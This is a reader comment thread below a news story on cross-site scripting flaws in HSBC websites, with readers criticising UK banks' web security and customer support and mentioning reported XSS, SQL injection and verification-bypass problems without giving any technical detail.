back to article HSBC scripting flaws play into the hands of phishers

Several HSBC websites are subject to scripting flaws that create a possible mechanism for crooks to create more convincing phishing scams. Security blog has posted a list of affected domains, which include HSBC sites in multiple territories including the UK. Xssed has been tracking problems on the bank's sites since …


This topic is closed for new posts.
  1. Mark
    Gates Horns

    HSBC / First Direct - Clueless muppets.

    I contacted them the other week with regards to EVV Certificates, and the fact that First Direct seemed to be failing (according to Opera's strict EVV implementation), they had no idea at what EVV was, let alone cross site scripting that was breaking the site.

    I would move banks, but experience says that they are all pretty much clueless when it comes to security..

  2. amanfromMars Silver badge

    Cutting to the Chase and Chastened.....

    A Right Royal Cock Up in other Words?

    And a Question for Modesty's Sake/Stake.

    cc ... HMGCC re Cinderella ProgramMIng.

    And just so atypical of Python Psyche to Fail Delivery with False Modesty.

    There's Work to be Done, Empire States 42 Build.

  3. Anonymous Coward
    Paris Hilton

    Two months? What a bunch of optimists

    Two months is a rather optimistic estimate for HSBC security process.

    Their Verified by Visa marketing gimmick was storing state in clients in a way where you could skip all verification steps with Konqueror. I tried to explain this to them and they simply did not care. So I gave up and registered with Mozilla. This was more than a year ago and last time I had a look at it the bug was still there.

    Paris, as the symbol of their (and not only their) UK banking coding quality and security.

  4. Anonymous Coward


    The UK site is still open to SQL injection attack. They also took 6 months to add a major city's branch details back to their search results, long after I had told them about the problem a total of 6 times by various means.

  5. Ian Michael Gumby
    Gates Horns

    Global Bank + global workforce = ...

    Clueless-ness on a global level.

    This is what happens when you have teams of people who don't know more than the basics and are used to thinking of security as an afterthought.

    Want someone to blame? Blame Microsoft. Yeah Microsoft. Not because they use Microsoft's products but because Microsoft was the first major software company who's mantra was "Rush to be first to market, then clean up the mess later."

  6. Anonymous Coward


    Yep, I think they are all about as bad as each other. Nat West/RBS assured me that if my browser passed their user agent verification then they were prepared to *guarantee* that my system was secure and they were extremely confident in this security system.

  7. Anonymous Coward

    Co-op too?

    Been getting a lot of phish-bait in the spamtrap which claims to tbe Co-op related recently.

  8. Solomon Grundy

    Screw It

    You know, all this Internet banking stuff is total crap. The world worked just find (some would argue better) before everyone expected instant responses. The crap coding coming out of so many professionals these days, combined with the dishonest attitudes of so many people completely take away any advantage the online world offers. Except of course to get online and comment on various websites for no gain.

    Back to cash and barter.

  9. MrT

    First Direct

    I'm with them, but since I know how secure Internet banking is I always pick up the phone - hard-line, not VOIP. They are there 24/7 and I would rather talk than type.

    Not quite face to face, but it's on my terms and not some 'closed by 3:30' local-ish sales office (that'd be Lloyds-TSB mostly; don't know why my wife puts up with their 'annual review' insults).

This topic is closed for new posts.

Other stories you might like

Biting the hand that feeds IT © 1998–2022